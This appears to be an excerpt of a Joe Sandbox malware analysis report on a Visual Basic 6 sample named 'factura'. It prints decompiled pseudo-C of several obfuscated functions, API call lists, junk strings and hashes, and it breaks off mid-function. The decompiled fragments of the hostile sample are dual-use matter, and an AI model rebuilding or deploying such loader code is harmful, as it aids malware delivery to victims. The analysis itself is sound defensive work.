        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$#569#712AddrefCallCheckChkstkCopyHresultLateMoveNew2
        • String ID: I;$YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30$cer
        • API String ID: 1705650133-4229211588
        • Opcode ID: 149c752a26b154fa0079304a3fd2b8ac76c1e9712543000bd852778128dc6841
        • Instruction ID: fbdb504a882c2f443251f9ac37b7be8229b5af5a59ddeca6139be7c72cb4a837
        • Opcode Fuzzy Hash: 149c752a26b154fa0079304a3fd2b8ac76c1e9712543000bd852778128dc6841
        • Instruction Fuzzy Hash: 9F313771950208BBCF14EBA1DD86FADBBB4AF14704F60853BF001761F1DABDA9418B59
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 60%
        			E00409E55(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a12) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				long long* _v16;
        				char* _v28;
        				void* _v32;
        				short _v36;
        				void* _v52;
        				char _v56;
        				char _v72;
        				char _v88;
        				char* _v96;
        				intOrPtr _v104;
        				short _v108;
        				signed int _t30;
        				char* _t34;
        				char* _t39;
        				void* _t51;
        				void* _t53;
        				long long* _t54;
        				char* _t55;
        				long long _t56;
        
        				_t56 = __fp0;
        				_t54 = _t53 - 0xc;
        				 *[fs:0x0] = _t54;
        				L00401420();
        				_v16 = _t54;
        				_v12 = 0x401360;
        				_v8 = 0;
        				_t30 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x401426, _t51);
        				L0040163C();
        				_push(2);
        				_push(0x402adc);
        				L00401510();
        				L00401678();
        				_push(_t30);
        				_push(0x402ae8);
        				L0040167E();
        				asm("sbb eax, eax");
        				_v108 =  ~( ~( ~_t30));
        				_t39 =  &_v56;
        				L0040166C();
        				_t34 = _v108;
        				_t55 = _t34;
        				if(_t55 != 0) {
        					_push(0xc9);
        					L00401642();
        					_v28 = _t34;
        				}
        				asm("fldz");
        				_push(_t39);
        				_push(_t39);
        				 *_t54 = _t56;
        				L0040150A();
        				L004015F4();
        				asm("fcomp qword [0x401358]");
        				asm("fnstsw ax");
        				asm("sahf");
        				if(_t55 != 0) {
        					_v96 = L"GASTROCHAENA";
        					_v104 = 8;
        					L004015BE();
        					_push( &_v72);
        					_t34 =  &_v88;
        					_push(_t34);
        					L00401504();
        					L00401630();
        					L0040164E();
        				}
        				_v36 = 0x3a9a;
        				asm("wait");
        				_push(E00409F79);
        				L0040166C();
        				L0040164E();
        				return _t34;
        			}
























        0x00409e55
        0x00409e58
        0x00409e67
        0x00409e71
        0x00409e79
        0x00409e7c
        0x00409e83
        0x00409e92
        0x00409e9b
        0x00409ea0
        0x00409ea2
        0x00409ea7
        0x00409eb1
        0x00409eb6
        0x00409eb7
        0x00409ebc
        0x00409ec3
        0x00409ec9
        0x00409ecd
        0x00409ed0
        0x00409ed5
        0x00409ed9
        0x00409edb
        0x00409edd
        0x00409ee2
        0x00409ee7
        0x00409ee7
        0x00409eea
        0x00409eec
        0x00409eed
        0x00409eee
        0x00409ef1
        0x00409ef6
        0x00409efb
        0x00409f01
        0x00409f03
        0x00409f04
        0x00409f06
        0x00409f0d
        0x00409f1a
        0x00409f22
        0x00409f23
        0x00409f26
        0x00409f27
        0x00409f32
        0x00409f3a
        0x00409f3a
        0x00409f3f
        0x00409f45
        0x00409f46
        0x00409f6b
        0x00409f73
        0x00409f78

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00409E71
        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409E9B
        • #512.MSVBVM60(00402ADC,00000002,?,?,?,?,00401426), ref: 00409EA7
        • __vbaStrMove.MSVBVM60(00402ADC,00000002,?,?,?,?,00401426), ref: 00409EB1
        • __vbaStrCmp.MSVBVM60(00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EBC
        • __vbaFreeStr.MSVBVM60(00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409ED0
        • #569.MSVBVM60(000000C9,00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EE2
        • #585.MSVBVM60(?,?,00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EF1
        • __vbaFpR8.MSVBVM60(?,?,00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EF6
        • __vbaVarDup.MSVBVM60 ref: 00409F1A
        • #666.MSVBVM60(?,?), ref: 00409F27
        • __vbaVarMove.MSVBVM60(?,?), ref: 00409F32
        • __vbaFreeVar.MSVBVM60(?,?), ref: 00409F3A
        • __vbaFreeStr.MSVBVM60(00409F79,?,?,00402AE8,00000000,00402ADC,00000002), ref: 00409F6B
        • __vbaFreeVar.MSVBVM60(00409F79,?,?,00402AE8,00000000,00402ADC,00000002), ref: 00409F73
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$Move$#512#569#585#666ChkstkCopy
        • String ID: GASTROCHAENA$*@
        • API String ID: 1152186010-3897368032
        • Opcode ID: e8726b73bfd971d74fa60f51edeb8565b4532db6f9bd936a770290e02400ae0e
        • Instruction ID: 820aef93537f675536f56a744883c169d1da30338a64661390688f8281fc52e0
        • Opcode Fuzzy Hash: e8726b73bfd971d74fa60f51edeb8565b4532db6f9bd936a770290e02400ae0e
        • Instruction Fuzzy Hash: 1B21F970940209ABCB00EFA1CD56EAEB774AF40B04F54853AB002BB1E1DB7D5A05CB99
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 51%
        			E0040AAD5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v44;
        				char* _v52;
        				intOrPtr _v60;
        				intOrPtr _v84;
        				intOrPtr _v92;
        				short _v112;
        				char* _t34;
        				char* _t36;
        				short _t37;
        				intOrPtr _t63;
        
        				_push(0x401426);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t63;
        				_push(0x60);
        				L00401420();
        				_v12 = _t63;
        				_v8 = 0x4013f8;
        				_v52 = L"11-11-11";
        				_v60 = 8;
        				L004015BE();
        				_t34 =  &_v44;
        				_push(_t34);
        				L0040157C();
        				_v112 =  ~(0 | _t34 != 0x0000ffff);
        				L0040164E();
        				if(_v112 != 0) {
        					_v52 = L"Overtook6";
        					_v60 = 8;
        					_v84 = 0x81d81b;
        					_v92 = 3;
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(2);
        					_push(L"kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98");
        					_push(_v28);
        					L004015FA();
        				}
        				_v52 = L"11-11-11";
        				_v60 = 8;
        				L004015BE();
        				_t36 =  &_v44;
        				_push(_t36);
        				L0040157C();
        				_v112 =  ~(0 | _t36 != 0x0000ffff);
        				L0040164E();
        				_t37 = _v112;
        				if(_t37 != 0) {
        					_push(0x4e);
        					L004014C8();
        					_v24 = _t37;
        				}
        				_push(E0040ABFA);
        				L004015E8();
        				return _t37;
        			}

















        0x0040aada
        0x0040aae5
        0x0040aae6
        0x0040aaed
        0x0040aaf0
        0x0040aaf8
        0x0040aafb
        0x0040ab02
        0x0040ab09
        0x0040ab16
        0x0040ab1b
        0x0040ab1e
        0x0040ab1f
        0x0040ab2f
        0x0040ab36
        0x0040ab41
        0x0040ab43
        0x0040ab4a
        0x0040ab51
        0x0040ab58
        0x0040ab5f
        0x0040ab62
        0x0040ab6c
        0x0040ab6d
        0x0040ab6e
        0x0040ab6f
        0x0040ab70
        0x0040ab73
        0x0040ab7d
        0x0040ab7e
        0x0040ab7f
        0x0040ab80
        0x0040ab81
        0x0040ab83
        0x0040ab88
        0x0040ab8b
        0x0040ab90
        0x0040ab93
        0x0040ab9a
        0x0040aba7
        0x0040abac
        0x0040abaf
        0x0040abb0
        0x0040abc0
        0x0040abc7
        0x0040abcc
        0x0040abd2
        0x0040abd4
        0x0040abd6
        0x0040abde
        0x0040abde
        0x0040abe1
        0x0040abf4
        0x0040abf9

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040AAF0
        • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AB16
        • #557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AB1F
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AB36
        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040AB62
        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040AB73
        • __vbaLateMemCall.MSVBVM60(?,kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98,00000002,?,?,?,?,?,?,?,?), ref: 0040AB8B
        • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABA7
        • #557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABB0
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABC7
        • #571.MSVBVM60(0000004E,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABD6
        • __vbaFreeObj.MSVBVM60(0040ABFA,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABF4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$ChkstkFree$#557$#571CallLate
        • String ID: 11-11-11$Overtook6$kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98
        • API String ID: 3750654714-3297755928
        • Opcode ID: e14d764c0df143388987e10003d0bc8cbb9a7b4787ab51dbc2e01cf67aafef8d
        • Instruction ID: 5829a43268710e35ae73b5e63829790e3dd3fe720ed5a1d00a0d7345b5942c17
        • Opcode Fuzzy Hash: e14d764c0df143388987e10003d0bc8cbb9a7b4787ab51dbc2e01cf67aafef8d
        • Instruction Fuzzy Hash: 58317E70900309ABDB04DFA1D886BEEBBB9AF05B04F44453AF501BB1E0DBB855898B59
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 261 409270-4092e0 __vbaChkstk __vbaVarTstNe 263 409332-409339 261->263 264 4092e2-40932f __vbaChkstk * 2 __vbaLateMemCall 261->264 265 409356 263->265 266 40933b-409354 __vbaNew2 263->266 264->263 267 409360-409383 265->267 266->267 269 409385-40939d __vbaHresultCheckObj 267->269 270 40939f 267->270 271 4093a6-4093d6 269->271 270->271 273 4093d8-4093f9 __vbaHresultCheckObj 271->273 274 4093fb 271->274 275 409402-40945b __vbaStrMove __vbaFreeObj * 2 __vbaFreeStr 273->275 274->275
        C-Code - Quality: 53%
        			E00409270(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				short _v28;
        				intOrPtr _v32;
        				void* _v36;
        				signed int _v40;
        				void* _v44;
        				char* _v68;
        				char _v76;
        				intOrPtr _v84;
        				char _v92;
        				intOrPtr _v100;
        				intOrPtr _v108;
        				intOrPtr* _v128;
        				signed int _v132;
        				intOrPtr* _v136;
        				signed int _v140;
        				intOrPtr _v152;
        				intOrPtr* _v156;
        				signed int _v160;
        				signed int _v164;
        				char* _t64;
        				signed int _t71;
        				signed int _t76;
        				signed int _t77;
        				void* _t92;
        				void* _t94;
        				intOrPtr _t95;
        
        				_t95 = _t94 - 0xc;
        				 *[fs:0x0] = _t95;
        				L00401420();
        				_v16 = _t95;
        				_v12 = 0x4012b8;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t92);
        				_v68 = 0x4029c4;
        				_v76 = 8;
        				_v84 = 1;
        				_v92 = 0x8002;
        				_push( &_v76);
        				_t64 =  &_v92;
        				_push(_t64);
        				L00401612();
        				if(_t64 != 0) {
        					_v68 = L"Solicits9";
        					_v76 = 8;
        					_v100 = 0xdb81d;
        					_v108 = 3;
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(2);
        					_push(L"chtN96");
        					_push(_v32);
        					L004015FA();
        				}
        				if( *0x40c33c != 0) {
        					_v156 = 0x40c33c;
        				} else {
        					_push(0x40c33c);
        					_push(0x4026e4);
        					L0040165A();
        					_v156 = 0x40c33c;
        				}
        				_v128 =  *_v156;
        				_t71 =  *((intOrPtr*)( *_v128 + 0x14))(_v128,  &_v44);
        				asm("fclex");
        				_v132 = _t71;
        				if(_v132 >= 0) {
        					_v160 = _v160 & 0x00000000;
        				} else {
        					_push(0x14);
        					_push(0x4026d4);
        					_push(_v128);
        					_push(_v132);
        					L00401654();
        					_v160 = _t71;
        				}
        				_v136 = _v44;
        				_t76 =  *((intOrPtr*)( *_v136 + 0xe8))(_v136,  &_v40);
        				asm("fclex");
        				_v140 = _t76;
        				if(_v140 >= 0) {
        					_v164 = _v164 & 0x00000000;
        				} else {
        					_push(0xe8);
        					_push(0x402934);
        					_push(_v136);
        					_push(_v140);
        					L00401654();
        					_v164 = _t76;
        				}
        				_t77 = _v40;
        				_v152 = _t77;
        				_v40 = _v40 & 0x00000000;
        				L00401678();
        				L004015E8();
        				_v28 = 0x2e8f;
        				_push(E0040945C);
        				L004015E8();
        				L0040166C();
        				return _t77;
        			}
































        0x00409273
        0x00409282
        0x0040928e
        0x00409296
        0x00409299
        0x004092a0
        0x004092af
        0x004092b2
        0x004092b9
        0x004092c0
        0x004092c7
        0x004092d1
        0x004092d2
        0x004092d5
        0x004092d6
        0x004092e0
        0x004092e2
        0x004092e9
        0x004092f0
        0x004092f7
        0x004092fe
        0x00409301
        0x0040930b
        0x0040930c
        0x0040930d
        0x0040930e
        0x0040930f
        0x00409312
        0x0040931c
        0x0040931d
        0x0040931e
        0x0040931f
        0x00409320
        0x00409322
        0x00409327
        0x0040932a
        0x0040932f
        0x00409339
        0x00409356
        0x0040933b
        0x0040933b
        0x00409340
        0x00409345
        0x0040934a
        0x0040934a
        0x00409368
        0x00409377
        0x0040937a
        0x0040937c
        0x00409383
        0x0040939f
        0x00409385
        0x00409385
        0x00409387
        0x0040938c
        0x0040938f
        0x00409392
        0x00409397
        0x00409397
        0x004093a9
        0x004093c1
        0x004093c7
        0x004093c9
        0x004093d6
        0x004093fb
        0x004093d8
        0x004093d8
        0x004093dd
        0x004093e2
        0x004093e8
        0x004093ee
        0x004093f3
        0x004093f3
        0x00409402
        0x00409405
        0x0040940b
        0x00409418
        0x00409420
        0x00409425
        0x0040942b
        0x0040944e
        0x00409456
        0x0040945b

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040928E
        • __vbaVarTstNe.MSVBVM60(00008002,00000008), ref: 004092D6
        • __vbaChkstk.MSVBVM60(?,?,00008002,00000008), ref: 00409301
        • __vbaChkstk.MSVBVM60(?,?,00008002,00000008), ref: 00409312
        • __vbaLateMemCall.MSVBVM60(?,chtN96,00000002,?,?,00008002,00000008), ref: 0040932A
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,00008002,00000008), ref: 00409345
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 00409392
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,000000E8), ref: 004093EE
        • __vbaStrMove.MSVBVM60 ref: 00409418
        • __vbaFreeObj.MSVBVM60 ref: 00409420
        • __vbaFreeObj.MSVBVM60(0040945C), ref: 0040944E
        • __vbaFreeStr.MSVBVM60(0040945C), ref: 00409456
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$ChkstkFree$CheckHresult$CallLateMoveNew2
        • String ID: Solicits9$chtN96
        • API String ID: 86130054-2940086331
        • Opcode ID: 8dd3d24ee122c9ae043efbb72a20e6b572157bfcb6f0737ba2d1292a0c66ed10
        • Instruction ID: efbcb55593de333b7ffc91ee1c8707e4c98f873287b5aa52e7dc53282853c468
        • Opcode Fuzzy Hash: 8dd3d24ee122c9ae043efbb72a20e6b572157bfcb6f0737ba2d1292a0c66ed10
        • Instruction Fuzzy Hash: 16510971D00218DBDB10DF95C886BDDBBB4BF08308F5085AAE449BB2E2CBB95985DF54
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 43%
        			E0040A266(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v28;
        				short _v32;
        				char* _v40;
        				char _v48;
        				intOrPtr _v56;
        				char _v64;
        				char _v80;
        				intOrPtr _v104;
        				intOrPtr _v112;
        				char* _v136;
        				char _v144;
        				intOrPtr _v168;
        				intOrPtr _v176;
        				short _v196;
        				short _t49;
        				short _t54;
        				void* _t70;
        				void* _t72;
        				intOrPtr _t73;
        
        				_t73 = _t72 - 0xc;
        				 *[fs:0x0] = _t73;
        				L00401420();
        				_v16 = _t73;
        				_v12 = 0x401398;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t70);
        				_v56 = 0x80020004;
        				_v64 = 0xa;
        				_v40 = 0xc;
        				_v48 = 2;
        				_push(1);
        				_push(1);
        				_push( &_v64);
        				_push( &_v48);
        				_push( &_v80);
        				L004014F2();
        				_v136 = 0xc;
        				_v144 = 0x8002;
        				_push( &_v80);
        				_t49 =  &_v144;
        				_push(_t49);
        				L00401612();
        				_v196 = _t49;
        				_push( &_v80);
        				_push( &_v64);
        				_push( &_v48);
        				_push(3);
        				L00401600();
        				if(_v196 != 0) {
        					_v104 = _a4;
        					_v112 = 9;
        					_v136 = L"rigmand";
        					_v144 = 8;
        					_v168 = 0x77553b;
        					_v176 = 3;
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(3);
        					_push(L"ISA93");
        					_push(_v28);
        					L004015FA();
        				}
        				_v40 = 0x80020004;
        				_v48 = 0xa;
        				_t54 =  &_v48;
        				_push(_t54);
        				L0040155E();
        				_v32 = _t54;
        				L0040164E();
        				_push(E0040A3F7);
        				L004015E8();
        				return _t54;
        			}

























        0x0040a269
        0x0040a278
        0x0040a284
        0x0040a28c
        0x0040a28f
        0x0040a296
        0x0040a2a5
        0x0040a2a8
        0x0040a2af
        0x0040a2b6
        0x0040a2bd
        0x0040a2c4
        0x0040a2c6
        0x0040a2cb
        0x0040a2cf
        0x0040a2d3
        0x0040a2d4
        0x0040a2d9
        0x0040a2e3
        0x0040a2f0
        0x0040a2f1
        0x0040a2f7
        0x0040a2f8
        0x0040a2fd
        0x0040a307
        0x0040a30b
        0x0040a30f
        0x0040a310
        0x0040a312
        0x0040a323
        0x0040a32c
        0x0040a32f
        0x0040a336
        0x0040a340
        0x0040a34a
        0x0040a354
        0x0040a35e
        0x0040a361
        0x0040a36b
        0x0040a36c
        0x0040a36d
        0x0040a36e
        0x0040a36f
        0x0040a372
        0x0040a37f
        0x0040a380
        0x0040a381
        0x0040a382
        0x0040a383
        0x0040a386
        0x0040a393
        0x0040a394
        0x0040a395
        0x0040a396
        0x0040a397
        0x0040a399
        0x0040a39e
        0x0040a3a1
        0x0040a3a6
        0x0040a3a9
        0x0040a3b0
        0x0040a3b7
        0x0040a3ba
        0x0040a3bb
        0x0040a3c0
        0x0040a3c7
        0x0040a3cc
        0x0040a3f1
        0x0040a3f6

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040A284
        • #660.MSVBVM60(?,00000002,0000000A,00000001,00000001), ref: 0040A2D4
        • __vbaVarTstNe.MSVBVM60(00008002,?), ref: 0040A2F8
        • __vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?,00008002,?), ref: 0040A312
        • __vbaChkstk.MSVBVM60 ref: 0040A361
        • __vbaChkstk.MSVBVM60 ref: 0040A372
        • __vbaChkstk.MSVBVM60 ref: 0040A386
        • __vbaLateMemCall.MSVBVM60(?,ISA93,00000003), ref: 0040A3A1
        • #648.MSVBVM60(0000000A), ref: 0040A3BB
        • __vbaFreeVar.MSVBVM60(0000000A), ref: 0040A3C7
        • __vbaFreeObj.MSVBVM60(0040A3F7,0000000A), ref: 0040A3F1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Chkstk$Free$#648#660CallLateList
        • String ID: ;Uw$ISA93$rigmand
        • API String ID: 2694029159-1757006994
        • Opcode ID: 9d9859830ffe460deb63b6dfd3090830d123d2e9c16b5688880ef22a3c10ea4d
        • Instruction ID: cd45b93c9e3a27016b7ebc6b48013dddeac0324bcd3bb2e7b406c3fa7f70fadf
        • Opcode Fuzzy Hash: 9d9859830ffe460deb63b6dfd3090830d123d2e9c16b5688880ef22a3c10ea4d
        • Instruction Fuzzy Hash: 98415F71D00308EBDB11DF95C846BCEB7B9BF05704F40846AF904BB291DBB99A458F65
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 46%
        			E00408F5B(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
        				intOrPtr _v8;
        				long long* _v12;
        				char _v36;
        				char* _v44;
        				intOrPtr _v52;
        				char* _t16;
        				char* _t18;
        				long long* _t28;
        				void* _t29;
        				long long _t31;
        
        				_t29 = __eflags;
        				_t18 = __ecx;
        				_push(__ecx);
        				_push(__ecx);
        				_push(0x401426);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t28;
        				_t16 = 0x24;
        				L00401420();
        				_v12 = _t28;
        				_v8 = 0x401298;
        				_push(__ecx);
        				_push(__ecx);
        				 *_t28 =  *0x401290;
        				_t31 =  *0x401290;
        				_push(__ecx);
        				_push(__ecx);
        				 *_t28 = _t31;
        				asm("fldz");
        				_push(__ecx);
        				_push(__ecx);
        				 *_t28 = _t31;
        				L004015CA();
        				L004015F4();
        				asm("fcomp qword [0x401288]");
        				asm("fnstsw ax");
        				asm("sahf");
        				if(__eflags != 0) {
        					_v44 = L"penplotter";
        					_v52 = 8;
        					L004015BE();
        					_t16 =  &_v36;
        					_push(_t16);
        					L004015C4();
        					_t18 =  &_v36;
        					L0040164E();
        				}
        				asm("fldz");
        				_push(_t18);
        				_push(_t18);
        				 *_t28 = _t31;
        				L004015B8();
        				L004015F4();
        				asm("fcomp qword [0x401280]");
        				asm("fnstsw ax");
        				asm("sahf");
        				if(_t29 != 0) {
        					_v44 = L"Betjeningens";
        					_v52 = 8;
        					L004015BE();
        					_t16 =  &_v36;
        					_push(_t16);
        					L004015C4();
        					L0040164E();
        				}
        				asm("wait");
        				_push(E0040903C);
        				return _t16;
        			}













        0x00408f5b
        0x00408f5b
        0x00408f5e
        0x00408f5f
        0x00408f60
        0x00408f6b
        0x00408f6c
        0x00408f75
        0x00408f76
        0x00408f7e
        0x00408f81
        0x00408f8e
        0x00408f8f
        0x00408f90
        0x00408f93
        0x00408f99
        0x00408f9a
        0x00408f9b
        0x00408f9e
        0x00408fa0
        0x00408fa1
        0x00408fa2
        0x00408fa5
        0x00408faa
        0x00408faf
        0x00408fb5
        0x00408fb7
        0x00408fb8
        0x00408fba
        0x00408fc1
        0x00408fce
        0x00408fd3
        0x00408fd6
        0x00408fd7
        0x00408fdc
        0x00408fdf
        0x00408fdf
        0x00408fe4
        0x00408fe6
        0x00408fe7
        0x00408fe8
        0x00408feb
        0x00408ff0
        0x00408ff5
        0x00408ffb
        0x00408ffd
        0x00408ffe
        0x00409000
        0x00409007
        0x00409014
        0x00409019
        0x0040901c
        0x0040901d
        0x00409025
        0x00409025
        0x0040902a
        0x0040902b
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00408F76
        • #671.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FA5
        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FAA
        • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FCE
        • #529.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FD7
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FDF
        • #583.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FEB
        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FF0
        • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409014
        • #529.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040901D
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409025
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$#529Free$#583#671Chkstk
        • String ID: Betjeningens$penplotter
        • API String ID: 3337120450-2381333887
        • Opcode ID: 30a8da4502bbc622766b74ec4dc90bde2ed25b45617b361664e37fb62d55f059
        • Instruction ID: bb208a3c7f835f8ad071c62f5d722c26f2dfd6097b3eb7f3912c2590df176cba
        • Opcode Fuzzy Hash: 30a8da4502bbc622766b74ec4dc90bde2ed25b45617b361664e37fb62d55f059
        • Instruction Fuzzy Hash: 6F1108B0820519BACB04AF91DD9AEEEBBB8FB44744F44467EF081760E1DBBC1904876D
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 54%
        			E0040971F(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, void* _a12) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				void* _v24;
        				long long _v32;
        				intOrPtr _v40;
        				char _v48;
        				char _v64;
        				char* _v72;
        				intOrPtr _v80;
        				short _v84;
        				intOrPtr _t25;
        				char* _t26;
        				char* _t32;
        				intOrPtr _t48;
        				long long _t52;
        
        				_t52 = __fp0;
        				_push(0x401426);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t48;
        				_t25 = 0x44;
        				L00401420();
        				_v12 = _t48;
        				_v8 = 0x4012d8;
        				L0040163C();
        				L00401576();
        				_v40 = _t25;
        				_v48 = 8;
        				_t26 =  &_v48;
        				_push(_t26);
        				L0040157C();
        				_v84 =  ~(0 | _t26 != 0x0000ffff);
        				L0040164E();
        				if(_v84 != 0) {
        					_push(L"Laanendes7");
        					_push(0xcb);
